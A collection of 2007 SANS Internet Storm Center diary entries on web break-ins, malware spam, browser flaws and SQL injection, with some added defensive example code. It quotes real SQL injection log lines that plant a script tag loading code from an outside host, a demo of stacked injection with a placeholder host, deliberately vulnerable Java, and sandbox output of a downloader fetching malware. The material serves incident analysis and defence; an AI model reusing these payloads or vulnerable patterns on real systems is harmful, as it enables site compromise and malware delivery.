Published: 2007-02-28

Super Bowl Infection - Analysis of One Break-in

A few weekends ago we posted a diary about several web sites that were infected by a one-line script pointer to sites containing hostile code.  The initial site that got everybody's attention belonged to the Dolphins Stadium, and that led us to finding several more that we listed in that diary.  Since then several of the system administrators of those sites have written back to us confirming that they had been targeted.  One system administrator provided us with some excellent analysis and feedback, and gave us permission to post it below.  I've cleaned his comments up a bit to remove any attribution.

Fyi, we do not use DreamWeaver.

What boggles my mind is how we got attacked and how the hackers successfully corrupted one SQL table record.

All Windows security patches were up-to-date.

There is no SQL patch for this, as far as I know, just a lazy programming technique allowing untrusted text to be attached to SQL parameters (typical SQL injection).

I have found in our IS logs this attacker’s string occurring several times early in January:

2007-01-01 17:37:27 - GET /jobs/job.asp ID=1343;update%20main%20set%20postitle='<script%20src="http://bc0.cn/1.js"></script>';-- 200 0 309 125

This source IP is from CHINANET-ZJ Jinhua node network - descr: Zhejiang Telecom

And later on several of these:

2007-01-13 23:44:31 - GET /jobs/job.asp ID=1343;update%20main%20set%20postitle='<script%20src="http://bc0.cn/1.js"></script>';-- 200 0 389 47

The source IP translates (reverse) to:

OrgName: Managed Solutions Group, Inc.
OrgID: MSG-48
Address: 46750 Fremont Blvd.
Address: #107
City: Fremont
StateProv: CA
PostalCode: 94538
Country: US

The first part is a usual reply to a dynamic query, preprocessed by IIS and sent to the client for display.

It contains details (all fields from the db record, including a field named ‘postitle’).

The hacker then will try to corrupt the record by replacing the field content with the exploit ‘js’ script.

When our visitor then downloads this page, he/she executes this script and infects himself with this Trojan, right?

So the chance is very slim to get infected from us. You have to know WHICH record to retrieve.

I tried to replicate this attack but was unable to. The 2nd part of SQL never executed.

That’s what is puzzling.

Note that IIS records return code 200, which indicates a successful operation.

Mind you, just ONE record was corrupted like this (out of many hundreds – these happened to be job opening positions).

We now edit very carefully input fields in online forms, and our developers updated DAO, Active-X and permissions from the webserver IIS to the SQL server (different box) – i.e. SQL permissions on individual table levels.

This was clearly a focused attack and we were targeted.

We are grateful for his analysis and willingness to share.  Remember that the last step in the six-step incident handling process is the Lessons Learned, and that sharing those lessons with others will help fellow system administrators learn from your experience.

Marcus H. Sachs
Director, SANS Internet Storm Center
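One detail in the administrator's analysis deserves emphasis: the injected requests were logged with status 200, so the status code gives no signal and the query string has to be inspected instead. As an added example (my own, not part of the diary or the administrator's analysis), here is a small Python scanner that parses IIS-style log lines, URL-decodes the query and flags stacked statements, comment terminators, script tags in parameters and tautologies. The log lines it runs over are constructed; the second one has the shape of the request quoted above, but the script host is a placeholder rather than the domain from the real attack.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style log lines (date time ip method uri-stem uri-query status ...).
# The second line mirrors the shape of the request quoted in the diary, with a
# placeholder script host instead of the real one.
SAMPLE_LOG = """\
2007-01-01 17:30:02 - GET /jobs/job.asp ID=1343 200 0 309 125
2007-01-01 17:37:27 - GET /jobs/job.asp ID=1343;update%20main%20set%20postitle='<script%20src="http://attacker.invalid/1.js"></script>';-- 200 0 309 125
2007-01-02 09:12:03 - GET /jobs/job.asp ID=1344%20OR%201=1 200 0 412 31
2007-01-02 09:15:44 - GET /about.asp - 200 0 1024 12
"""

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})"
)

# Each indicator is matched against the URL-decoded query string.
INDICATORS = [
    ("stacked statement", re.compile(r";\s*(update|insert|delete|drop|exec|declare)\b", re.I)),
    ("comment terminator", re.compile(r"--|/\*")),
    ("script tag in parameter", re.compile(r"<\s*script", re.I)),
    ("tautology", re.compile(r"\b(or|and)\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I)),
]


def classify_query(raw_query):
    """Return the names of every indicator that fires on one query string."""
    decoded = unquote(raw_query)
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_log(text):
    """Walk the log and report suspicious requests regardless of their status code."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["query"] == "-":
            continue
        reasons = classify_query(m["query"])
        if reasons:
            hits.append({
                "when": f"{m['date']} {m['time']}",
                "stem": m["stem"],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["when"], hit["stem"], hit["status"], ", ".join(hit["reasons"]))
```

Both flagged requests carry status 200, exactly as in the diary, which is why the scanner never consults the status field when deciding what to report; on a real log the same pass over the query column will also surface the earlier reconnaissance requests that precede a successful record update.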


Published: 2007-02-28

Something amiss on Yahoo! Mail?

We have received two separate reports of Symantec AV being triggered when accessing Yahoo! Mail today (w32.feebs).  Apparently the issue disappeared later during the day.

If you have any further information we would be glad to hear from you!

Thanks to Agris and William for bringing the matter to our attention.

Update:   Multiple users wrote in confirming the observation. Symantec has now posted a message stating that this is a false positive and they are working on a signature update to fix the problem.


Published: 2007-02-27

Solaris worm?

We have received a report today from our friend Jose over at Arbor, pointing us to this article

It looks like a net range over in France is scanning around for port 23.  Read the article for further details about the "worm".

We checked our data here at the Storm Center and it appears we have similar traffic from the same net ranges. 

The high number of targets but low number of sources also reflects that.  Check it out.

Joel Esler

Update (Arrigo): as of 13:00 UTC the sources number 102, which is still rather low; one hopes that there aren't that many publicly reachable Solaris systems running telnet.


Published: 2007-02-26

It's 10 p.m. Do you know where your children are?

Some of you may or may not  remember that question.  It started in the 60s and was asked right before the nightly 10pm news.    Many parents are now very aware of the need to know where their children are and would answer without hesitation.  We have learned the importance of knowing where our children are and who they are with.  However, many times, parents fail to realize that even though their kids are physically at home, they may be socializing with others on the internet and the parents do not even know it.

As a parent, I was asked by one of my kids for one of the latest toys that seems to be all the rage right now.  Some of you may or may not already have had the grand privilege of buying one of these. They are called "Webkinz". You buy a pet that looks like a beanie baby and with this pet comes a code. When your child visits the Webkinz website, they register and the code lets them adopt their pet in a virtual world.   I had spoken to another mother about them and she was telling me how great they were and how nice it was for her daughter to be able to be on the internet and in a safe environment.

So, I got my kids one of these new toys and I told them I wanted to check the site out first.  I registered one of my kids and it asked me for a first name, birthdate, city and state.  Then it asks for a username (and reminds kids NOT to use their real name).  It also asks that kids under 9 have an adult help them.  Now I'm in Webkinz world.  Your child has to take care of their pet and earn "Webkinz cash" to do this.   I explored the site in detail.  I did find one area that disturbed me.  My 6 year old knew the feature was there and was looking for it.  There is a "phone" on the website that you can power on.  This phone is a special chat utility that lists your friends and allows you to talk with them.  That bothered me, so I started looking at it closer.  With the phone, you can add your friends if you know their user name.  Not too bad at this point.  Then I decided to play in the "tournament arena" area.  You wait till an opponent has been found and then you are ready to play.  My child is 6 and I'm not a terrible game player, but I got killed at this particular mindless game.  Immediately after losing, a request appeared from the person I was playing asking to be added to my child's "friends" list.    After some research, I found the chats are restricted on what can be entered in them and this one appears to be well thought out.

My thoughts immediately went back to my friend who thought her daughter was on a "safe" site.  When I asked her about the chat capability, she had NO idea it was there.  She had logged on with her child, but did not know the extent of the website and its capabilities.  As parents, we can no longer assume something is safe on the internet.  Our kids are taught to never talk to a stranger in person, but most of them don't see the harm via the internet.  In this case, the parent didn't even realize it was a possibility.  It took me a full day to explore all the options on this website.

Please understand, that I am NOT bashing Webkinz.  My kids love the site, but now they have limits.  I have their user names and passwords and I can log on and check if they have added any "friends".  They are not allowed to do so without permission.  They are also not allowed to chat with any users they do not know nor accept any invitation to be added to a "friends" list. 

Times have really changed, and instead of just having to worry about where your kids are physically and who they are talking to, parents now have to be concerned about where they are in the cyber world and who they are talking to.  We can't afford to make the assumption that the sites they are visiting are safe.   The internet never closes.  Maybe the original question needs to be modified to say:  "It's 10 P.M.  Do you know where your children are, both physically and on the internet?"


Published: 2007-02-26


What happens when an adept of the dark side of the force looks at the documentation on JavaScript's onUnload() function?

Take a look for yourself and come back, we won't go anywhere:
So something that gets called no matter how the user tries to get away from a web page. Imagine what pages you might want to get away from ...

As the MSDN article says, adding a window.open() call in such a routine becomes a nightmare for the visitor, as (s)he'll never manage to get away on his/her own. Pop-up blockers should, if all goes right, detect and prevent that one case. But it gets worse: how about "location = self.location;"? Right, the visitor doesn't go away at all.

Is there anything new to this? Not as such, it's been known for years and was e.g. discussed in August of 2005 on full disclosure mailing lists.

One would assume that open discussion of such a function, where it is labeled as potentially evil, would cause security-conscious developers to take note of such a dangerous function and severely limit its possibilities, or better yet get rid of it altogether.

Yet there seems to have been no such luck. Worse, there seems to have been renewed attention from those using the dark side, as evidenced by these recent reactions:

MSIE 7: CVE-2007-1091 (mitre) or CVE-2007-1091 (nist)
"Microsoft Internet Explorer 7 allows remote attackers to prevent users from leaving a site, spoof the address bar, and conduct phishing and other attacks via onUnload Javascript handlers. "
Firefox: US-CERT Vulnerability Note VU#393921
"Mozilla Firefox fails to properly handle JavaScript onUnload events. Specifically, Firefox may not correctly handle freed data structures modified in the onUnload event handler possibly leading to memory corruption. By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user."

Personally I have a hard time seeing how supporting onUnload() matches with statements such as:
"Put safety first.
Robust new Internet Explorer 7 architecture and improved security features help protect you against malicious software, and help to keep your personal data safe from fraudulent websites and online phishing scams." (taken from http://www.microsoft.com/windows/products/winfamily/ie/default.mspx )
I'm sure Firefox will have a "security is important" statement just as well, but I didn't find it yet.

Best course of action: disable scripting, but most of you can't or don't want to do that. The second best alternative might be to use extensions such as NoScript in Firefox, which allows more selective control over who gets to do remote code execution in your browser. Yes, that's what allowing Java, VBScript and JavaScript basically is: allowing random websites to hand your browser code to execute ...

Swa Frantzen -- NET2S


Published: 2007-02-24

Kernel malware paper from F-Secure

Kimmo Kasslin from F-Secure has released a paper on kernel malware. The paper gives a brief overview of kernel malware, followed by a detailed analysis and case studies. If you ever wonder how kernel rootkits and other kernel-level malware work, this is a good paper to read.

Follow this link to the paper. Together with the paper, Kimmo's slides for his AVAR 2006 conference talk on the same topic have also been released.


Published: 2007-02-24

SupportSoft Active X fixed

SupportSoft's ActiveX control, which among other things allows remote assistance, has been updated, fixing a security issue leading to remote code execution.

Vendor info
CERT coordination

Security products affected:
But do note there are many more sources for these controls to sneak in through.

As for workarounds, consider disabling ActiveX and/or the list of killbits:

Swa Frantzen -- NET2S


Published: 2007-02-24

Prepared Statements and SQL injections

In the previous few days, I had numerous discussions with different people about the use of prepared statements to mitigate SQL injection vulnerabilities. Prepared statements definitely work well as part of the mitigation strategy for SQL injection if implemented properly. I still remember 4-5 years ago, when SQL injection just started to become popular, the common mitigation suggested was to use prepared statements as if they were a magic bullet. As we understand the SQL injection problem better, we realize that even prepared statements can be vulnerable to SQL injection.

The fundamental problem in SQL injection is the concatenation of untrusted data (raw user input) to trusted data, with the whole string then sent to the backend database for execution. The moment you merge raw untrusted data into other trusted data for execution, you have a problem.

Look at this prepared statement (Java)

// Deliberately vulnerable: UserInput is spliced into the SQL text before it is prepared.
PreparedStatement Stment = con.prepareStatement("SELECT * FROM table WHERE cond = '" + UserInput + "'");

UserInput, which is raw input from the user, is concatenated with the other string to form the SQL statement, which is then "prepared" for execution in the database. What's wrong here?  Untrusted data is concatenated with static strings and sent to the database for execution, with no validation whatsoever.... BOOM... SQL injection for ya.

Let's look at another version of this statement

// Parameterized: the statement text is fixed and UserInput is bound to the placeholder.
String Stment = "SELECT * FROM table WHERE cond = ?";
PreparedStatement prepSQL = con.prepareStatement(Stment);
prepSQL.setString(1, UserInput);
ResultSet rs = prepSQL.executeQuery();

See the question mark in the first line? That's the character that tells the prepared statement mechanism that more data is coming into this space. Think "fill in the blanks" exercise here: the question mark is an empty spot to be filled, and the setString function fills a string into that spot. When the statement is prepared, validation is performed on the user input; in the case of Java, the JDBC driver escapes the user input properly. Untrusted user input goes through validation and becomes validated input. This type of passing user input to the statement as a parameter is sometimes referred to as parameterized queries.

One risk still remains here.... The implementation of the database driver (or data access mechanism) has to accurately escape the potentially offensive user input. So far, the track record of such mechanisms across multiple languages is pretty good.

An extra note here about stored procedures, which were regarded as another potential mitigation for SQL injection as well: both prepared statements and stored procedures can be vulnerable to SQL injection if not done properly. Similar to prepared statements, stored procedures can be called in parameterized form to mitigate SQL injection.
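To make the contrast concrete, here is an added example (my own, not code from the diary) that reproduces both patterns in Python against an in-memory SQLite table named after the one in the Super Bowl diary. SQLite is used because it runs anywhere; the placeholder mechanics are the same as JDBC's setString. The function names, the table rows and both inputs are constructed. Note that sqlite3's execute() refuses stacked statements outright, so the stacked-query case uses executescript() to stand in for a driver that permits them, which is what the ASP page in the Super Bowl diary ran into.

```python
import sqlite3

# Constructed stand-in for the "main" table with its "postitle" column from the
# Super Bowl diary; the rows are invented.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE main (id INTEGER PRIMARY KEY, postitle TEXT)")
    con.executemany("INSERT INTO main (id, postitle) VALUES (?, ?)",
                    [(1343, "Network Engineer"), (1344, "Database Administrator")])
    con.commit()
    return con


def titles_concatenated(con, user_input):
    """The broken pattern: untrusted text becomes part of the SQL grammar."""
    sql = "SELECT postitle FROM main WHERE id = " + user_input + " ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def titles_parameterized(con, user_input):
    """The fill-in-the-blank pattern: the input is bound as a value, never parsed as SQL."""
    sql = "SELECT postitle FROM main WHERE id = ? ORDER BY id"
    return [row[0] for row in con.execute(sql, (user_input,))]


def page_concatenated_stacked(con, user_input):
    """Emulate a driver that accepts stacked statements. sqlite3.execute() refuses
    them, so executescript() stands in for what the ASP page in the diary did."""
    con.executescript("SELECT postitle FROM main WHERE id = " + user_input + ";")


def title_of(con, job_id):
    """Read one record back the safe way, to observe whether it was altered."""
    return con.execute("SELECT postitle FROM main WHERE id = ?", (job_id,)).fetchone()[0]


# Constructed inputs. The stacked one has the shape of the injected query string in
# the diary, with a placeholder script host.
TAUTOLOGY_INPUT = "1343 OR 1=1"
STACKED_INPUT = "1343; UPDATE main SET postitle='<script src=\"http://example.invalid/1.js\"></script>'; --"


if __name__ == "__main__":
    con = build_db()
    print("concatenated, tautology :", titles_concatenated(con, TAUTOLOGY_INPUT))
    print("parameterized, tautology:", titles_parameterized(con, TAUTOLOGY_INPUT))
    print("parameterized, stacked  :", titles_parameterized(con, STACKED_INPUT))
    print("record before           :", title_of(con, 1343))
    page_concatenated_stacked(con, STACKED_INPUT)
    print("record after concat     :", title_of(con, 1343))
```

With the tautology input the concatenated query returns every row while the parameterized one returns nothing, because the bound value is compared as data and never rewrites the WHERE clause; with the stacked input the concatenated page rewrites the record while the parameterized query leaves it untouched.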

Shameless plug - To get more info on web related security issues, SANS offers SEC 519 course on web application security.


Published: 2007-02-23

Firefox released

The Mozilla folks have released the long-awaited version of Firefox.  The second link below shows that 7 security issues were fixed.  One is rated critical.

Release Notes: http://www.mozilla.com/en-US/firefox/
Security Issues: http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.2


Published: 2007-02-23

Botnet with reference to SANS

In a lot of the malware that comes across the ISC, the author leaves in some kind of signature or message. This week, we received a report of a botnet malware with a reference to SANS (hidden in the code); the message is similar to the following:

You better f##k off SANS.org especially that Johannes Ullrich (jullrich@XXX, XXX-XXX-XXXX) and Kevin Hong (khong@XXX.kr, +XX-X-XX-XXX). I really don't have anything against you, just p##s off alright?

The author of the malware also registered 'sans-security.org' (now defunct)

The binary is a Vanbot variant.  At the time of writing, Virustotal has the following to say about the malware.

Antivirus Version Update Result
AntiVir 02.22.2007 BDS/VanBot.AY.6
Authentium 4.93.8 02.23.2007 W32/Trojan.YAZ
Avast 4.7.936.0 02.22.2007 no virus found
AVG 386 02.23.2007 BackDoor.Generic5.CLH
BitDefender 7.2 02.23.2007 no virus found
CAT-QuickHeal 9.00 02.22.2007 Backdoor.VanBot.ay
ClamAV devel-20060426 02.22.2007 no virus found
DrWeb 4.33 02.23.2007 BackDoor.IRC.Sdbot.1125
eSafe 02.23.2007 Win32.VanBot.ay
eTrust-Vet 30.4.3423 02.23.2007 Win32/Nirbot.K
Ewido 4.0 02.22.2007 Backdoor.IRCBot.aab
FileAdvisor 1 02.23.2007 no virus found
Fortinet 02.23.2007 W32/SDBot.H!worm
F-Prot 02.22.2007 W32/Trojan.YAZ
F-Secure 6.70.13030.0 02.23.2007 Backdoor.Win32.VanBot.ay
Ikarus T3.1.0.31 02.22.2007 Backdoor.Win32.VanBot.ay
Kaspersky 02.23.2007 Backdoor.Win32.VanBot.ay
McAfee 4969 02.22.2007 W32/Sdbot.worm.gen.h
Microsoft 1.2204 02.23.2007 no virus found
NOD32v2 2076 02.22.2007 Win32/Vanbot.AY
Norman 5.80.02 02.22.2007 no virus found
Panda 02.23.2007 W32/Sdbot.JWH.worm
Prevx1 V2 02.23.2007 Malware.Trojan.Backdoor.Gen
Sophos 4.14.0 02.21.2007 no virus found
Sunbelt 2.2.907.0 02.22.2007 no virus found
Symantec 10 02.23.2007 W32.Rinbot.B
TheHacker 02.21.2007 no virus found
UNA 1.83 02.22.2007 Backdoor.VanBot.E9CE
VBA32 3.11.2 02.22.2007 Backdoor.Win32.VanBot.ay
VirusBuster 4.3.19:9 02.22.2007 no virus found


Published: 2007-02-23

Reminder of our emergency URL

Just like any security-minded organization, the ISC has done its own emergency preparedness work. In situations where our main website cannot be accessed, we will be turning to an alternative location (a separate hosting location), iscems.dshield.org/index.txt

We suggest you keep this page bookmarked and handy, just in case anything ever happens. If we ever need to broadcast a message from our alternative site, the messages will be PGP signed.

Let's hope we never need to use the alternative site...... But we are never really sure.


Published: 2007-02-21

New NIST documents released

The NIST (National Institute of Standards and Technology ) released yesterday 3 new documents:

1. SP 800-45 Version 2, Guidelines on Electronic Mail Security
2. SP 800-94, Guide to Intrusion Detection and Prevention Systems (IDPS)
3. SP 800-97, Establishing Wireless Robust Security Networks: A Guide to IEEE 802.11i

I was just reading the 3 and they are very good. I really liked the IDPS document, with great updates since the Intrusion Detection System document, explaining the concepts, with good real world examples.

It was interesting to see how the documents complement each other. The E-mail document has good references to IDPS, which also include good information regarding WLAN...really nice and I recommend you to take a look at least on the Table of contents. I am sure you will continue the reading...!:)


Published: 2007-02-19

German spam with malware link

We've received a report that a spam is making the rounds; it's in German and has the Subject "Fand ich Sie zufallig!". According to the automated malware analysis we received from Sven Marten, at the link in the email one obtains 2 pieces of malware, the first of which has sporadic AV detection at the moment. The second looks to be a Riler variant. Thanks Sven! His email to us says:

"The attached file contains an email that has been spammed into my mailbox >100 times this evening, so it aroused my interest. if one wgets the link in it one finds fotoalbum.exe which virustotal identifies as


Complete scanning result of "fotoalbum.exe", received in VirusTotal at 02.19.2007, 23:56:16 (CET).

Antivirus Version Update Result
AntiVir 02.19.2007 HEUR/Crypted
Authentium 4.93.8 02.19.2007 W32/Downloader.gen10
Avast 4.7.936.0 02.19.2007 no virus found
AVG 386 02.19.2007 no virus found
BitDefender 7.2 02.19.2007 DeepScan:Generic.Malware.dld!!.7F0C2515
CAT-QuickHeal 9.00 02.19.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.19.2007 no virus found
DrWeb 4.33 02.19.2007 no virus found
eSafe 02.19.2007 no virus found
eTrust-Vet 30.4.3412 02.19.2007 no virus found
Ewido 4.0 02.19.2007 no virus found
FileAdvisor 1 02.20.2007 no virus found
Fortinet 02.19.2007 suspicious
F-Prot 02.19.2007 W32/Downloader.gen10
F-Secure 6.70.13030.0 02.19.2007 Trojan-Downloader.Win32.Tiny.ft
Ikarus T3.1.0.31 02.19.2007 Win32.SuspectCrc
Kaspersky 02.19.2007 Trojan-Downloader.Win32.Tiny.ft
McAfee 4966 02.19.2007 no virus found
Microsoft 1.2204 02.19.2007 no virus found
NOD32v2 2070 02.19.2007 Win32/TrojanDownloader.Tiny.NCF
Norman 5.80.02 02.19.2007 W32/Downloader
Panda 02.19.2007 Suspicious file
Prevx1 V2 02.20.2007 no virus found
Sophos 4.14.0 02.19.2007 no virus found
Sunbelt 2.2.907.0 02.17.2007 no virus found
Symantec 10 02.19.2007 no virus found
TheHacker 02.19.2007 no virus found
UNA 1.83 02.19.2007 no virus found
VBA32 3.11.2 02.19.2007 suspected of Win32.Trojan.Downloader (http://...)
VirusBuster 4.3.19:9 02.19.2007 no virus found

Aditional Information
File size: 2108 bytes
MD5: 4b86679ded1718aac5f5bc4840da3e75
SHA1: f42d7eb0934388d65364d212735aae65db26cd5e

norman sandbox: [ General information ]
* File length: 2108 bytes.

[ Changes to filesystem ]
* Creates file C:\WINDOWS\TEMP\zc2.exe.
[ Network services ]


* Downloads file from http://win20all.com/ar/zc2.exe as C:\WINDOWS\TEMP\zc2.exe.
* Connects to "win20all.com" on port 80 (TCP).
* Opens URL: win20all.com/ar/zc2.exe.

[ Security issues ]

* Starting downloaded file - potential security problem.


and if one now takes a look at .... zc2.exe it gives us this little nicety:


Complete scanning result of "zc2.exe", received in VirusTotal at 02.20.2007, 00:09:26 (CET).

Antivirus Version Update Result
AntiVir 02.19.2007 TR/Cimuz.B
Authentium 4.93.8 02.19.2007 W32/Cimuz.gen1@dr
Avast 4.7.936.0 02.19.2007 Win32:Agent-ENM
AVG 386 02.19.2007 Proxy.KMB
BitDefender 7.2 02.19.2007 Trojan.Cimuz.J
CAT-QuickHeal 9.00 02.19.2007 no virus found
ClamAV devel-20060426 02.19.2007 no virus found
DrWeb 4.33 02.19.2007 no virus found
eSafe 02.19.2007 Win32.Agent.ly
eTrust-Vet 30.4.3412 02.19.2007 Win32/Difisim!generic
Ewido 4.0 02.19.2007 Proxy.Agent.ly
FileAdvisor 1 02.20.2007 no virus found
Fortinet 02.19.2007 W32/Cimuz.BP!tr
F-Prot 02.19.2007 W32/Cimuz.gen1@dr
F-Secure 6.70.13030.0 02.19.2007 Trojan-Proxy.Win32.Agent.ly
Ikarus T3.1.0.31 02.19.2007 Trojan-Proxy.Win32.Agent.ly
Kaspersky 02.19.2007 Trojan-Proxy.Win32.Agent.ly
McAfee 4966 02.19.2007 Proxy-Agent.o
Microsoft 1.2204 02.19.2007 no virus found
NOD32v2 2070 02.19.2007 Win32/TrojanProxy.Cimuz.NAF
Norman 5.80.02 02.19.2007 W32/Agent.BBAA
Panda 02.19.2007 Trj/Cimuz.CZ
Prevx1 V2 02.20.2007 Malicious
Sophos 4.14.0 02.19.2007 Troj/Cimuz-BP
Sunbelt 2.2.907.0 02.17.2007 no virus found
Symantec 10 02.20.2007 Trojan.Riler.F
TheHacker 02.19.2007 Trojan/Proxy.Agent.ly
UNA 1.83 02.19.2007 TrojanProxy.Win32.Agent.694F
VBA32 3.11.2 02.19.2007 Trojan-Proxy.Win32.Agent.ly
VirusBuster 4.3.19:9 02.19.2007 Trojan.PR.Agent.SCN

Aditional Information
File size: 69632 bytes
MD5: d4862ca3b6f481141a2f3375ee237c81
SHA1: 97fc4d68b2432a2d0e7dd7750b67f3e4b0d9c166
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=0bc376578083


Published: 2007-02-19

Sourcefire addresses Snort vulnerability

The Sourcefire Vulnerability Research Team (VRT) today announced a vulnerability found in the DCE/RPC preprocessor in Snort and Sourcefire Intrusion Sensors.  The DCE/RPC preprocessor is vulnerable to a stack-based buffer overflow that could potentially allow an attacker to execute code with the same privileges as the Snort binary.

There are no publicly available exploits for this vulnerability at this time.

Mitigation for Snort:  If, for some reason, you can’t upgrade your version of Snort to v2.6.1.3, you can turn off the DCE/RPC preprocessor in your snort.conf file by commenting it out and restarting Snort.  Upgrading to the new version of Snort is highly recommended as soon as possible.  The new version of Snort is available here.

Your snort.conf will have an entry like:
preprocessor dcerpc: \
    autodetect \
    max_frag_size 3000 \
    memcap 100000
Just comment out these lines like:
#preprocessor dcerpc: \
#    autodetect \
#    max_frag_size 3000 \
#    memcap 100000
and restart Snort.  Then upgrade to v2.6.1.3.

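The stanza spans several lines joined by trailing backslashes, so commenting out only the first line leaves dangling continuation lines that Snort will choke on. As an added example (my own, not from Sourcefire or the diary), this Python helper comments out a whole preprocessor stanza by following the continuations, and lists which preprocessors remain active so the edit can be verified before restarting Snort. The snort.conf excerpt and the function names are constructed.

```python
import re

# Constructed snort.conf excerpt containing the dcerpc stanza shown in the diary;
# it is not a real configuration from any server.
SAMPLE_CONF = """\
preprocessor frag3_global: max_frags 65536
preprocessor dcerpc: \\
    autodetect \\
    max_frag_size 3000 \\
    memcap 100000
preprocessor http_inspect: global \\
    iis_unicode_map unicode.map 1252
"""


def disable_preprocessor(conf_text, name):
    """Comment out every 'preprocessor <name>' stanza, including the continuation
    lines joined to it by a trailing backslash, and return the new text."""
    out = []
    in_stanza = False
    for line in conf_text.splitlines():
        if not in_stanza and re.match(rf"\s*preprocessor\s+{re.escape(name)}\b", line):
            in_stanza = True
        if in_stanza:
            out.append("#" + line)
            # A trailing backslash means the stanza continues on the next line.
            in_stanza = line.rstrip().endswith("\\")
        else:
            out.append(line)
    return "\n".join(out) + "\n"


def active_preprocessors(conf_text):
    """List the preprocessors that are still enabled (not commented out)."""
    return re.findall(r"^\s*preprocessor\s+([^\s:]+)", conf_text, re.M)


if __name__ == "__main__":
    patched = disable_preprocessor(SAMPLE_CONF, "dcerpc")
    print(patched)
    print("still active:", ", ".join(active_preprocessors(patched)))
```

Run it against a copy of the real file, confirm that "dcerpc" is absent from the active list and that the other preprocessors are still present, then swap the file in and restart Snort; the same two functions are useful afterwards to confirm the stanza is back once v2.6.1.3 is installed.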
If you have a Sourcefire Intrusion Sensor, Sourcefire released SEU 64 today that patches this vulnerability, and this update can be downloaded from the Sourcefire Customer Support Web Site.  After downloading and installing SEU 64, you will need to re-push your policies out from your Defense Center.

Mitigation for Sourcefire customers:  If, for some reason, you can’t update your SEU, edit your policies, uncheck the DCE/RPC “Enabled” check box, and re-push your policy until you can upgrade.

This vulnerability has been identified as CVE-2006-5276.

Joel Esler
(Yes, I am a Sourcefire employee)


Published: 2007-02-19

WHOIS contact spam with malicious security maintenance script attachment

We received a report from Hugh Brower that there is a spammed email destined for whois contacts that contains a malicious php attachment. The email is spoofed to look like it's from the domain's hosting provider. The email attempts to trick the recipient into executing the attachment. Currently the attachment information is;

Attachment Name webguard.php
File size: 130990 bytes
MD5: 1071956063131f0fd178ace92ab526bb
SHA1: c47dd28e336030e3d940b66e2884aba91124a831

The email says;

"Subject: Hosting Regular Security Maintenance

Dear yourdomainhost valued Members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file "webguard.php" in:

"./public_html" or (for Windows Based servers) in: "./wwwroot" in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux or Windows based websites that use PHP/CGI/PERL/ASP:

1) Download the attachment named "webguard.php"

2) Login to your site Control panel.

3) Open "File Manager" window.

4) Go through "Public_html" or "htdocs" (for UNIX/Linux Based servers),

but for Windows Based server, please Go through "wwwroot" directory.

5) Choose "Upload Files"

6) Upload the file "webguard.php"

7) Check its URL too "http://www.yoursite.com/webguard.php", if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards"

The attack has targeted more than one domain but does not appear to be widespread at the moment. Additional details will be posted as they develop.

Thanks Hugh!


Published: 2007-02-19

Oz PM health alert spammed with links to exploit

We've received a report of a spammed email with a hyperlink that ultimately attempts to install malware. The email is targeting Australians; it references a heart attack that the Prime Minister has suffered. Of course, no such heart attack has occurred.

The email tells the reader to go to Australia's "The Australian - keeping the nation informed" website but the link is not for the real "The Australian" website. The bogus link is to austr-news.c_oh_m.

Thanks for the report Eric!


Published: 2007-02-17

The missing Microsoft patches updated

We've received information from Microsoft indicating how they are planning to deal with some of the vulnerabilities we are tracking in the missing Microsoft patches diary. The table is updated with our interpretation of how and when to expect a fix for the different issues. Note that these are expectations only; anything can change.

With many thanks to the folks in Redmond.

Swa Frantzen -- NET2S


Published: 2007-02-17

Javascript decoding round-up

In the recent past, we've shown several methods for unravelling obstinate JavaScript code used to convey exploits. Here's a brief round-up of the methods we commonly use. All four methods require that you get a copy of the hostile page, preferably by use of a text-only HTML tool like wget, curl or similar (since you cannot easily download a JavaScript exploit with a browser that speaks JavaScript without also running the JavaScript code at the same time).

The Lazy Method
Edit your copy of the hostile HTML so that it only contains the necessary HTML headers and the JavaScript you're interested in. Then hunt down all occurrences of "document.write" and "eval" inside the JavaScript and replace them with "alert". Copy the modified file onto a web server of yours, or to some other place from where you can easily open it with a web browser, which should make the decoded JavaScript appear inside one (or several) pop-up "alert" windows.

Pro: Quick and easy to accomplish
Con: Usually only decodes one (the first) encoding stage. Don't be disappointed if you get the next level of gibberish in your alert pop-up.

The Tom Liston Method
As explained e.g. in https://isc2.sans.org/diary.html?storyid=1917. In your copy of the hostile page, hunt down all the "eval(txt)" and "document.write(txt)" function calls, and replace them with document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); Then again put the modified HTML onto some place from where you can open it with a web browser. The decoded JavaScript will show up inside a textarea panel.

Pro: Quick and easy to accomplish, and in case the textarea reveals another stage of encoded Javascript, this method allows for easy cut-and-paste to continue the decoding.
Con: Careful with typos. If you have a typo in the leading textarea definition, the following "document.write(txt)" will go right to the browser, as it originally would have, and the exploit will execute.

The Perl-Fu Method
Try to make sense of the Javascript decoding routine, and then re-create it with a short code block in PERL.

Pro: Very easy and fast for use on the dumber encoding methods like XOR, Caesar ciphers (character permutations), etc. Also the "safest" method, as this approach alone does not actually execute the hostile code.
Con: You have to speak Perl and be able to translate the JavaScript decoding into Perl. Much too tedious an approach for very convoluted JavaScript, or JavaScript code using functions which are hard to translate into Perl (like the arguments.callee code seen frequently in fall 2006).
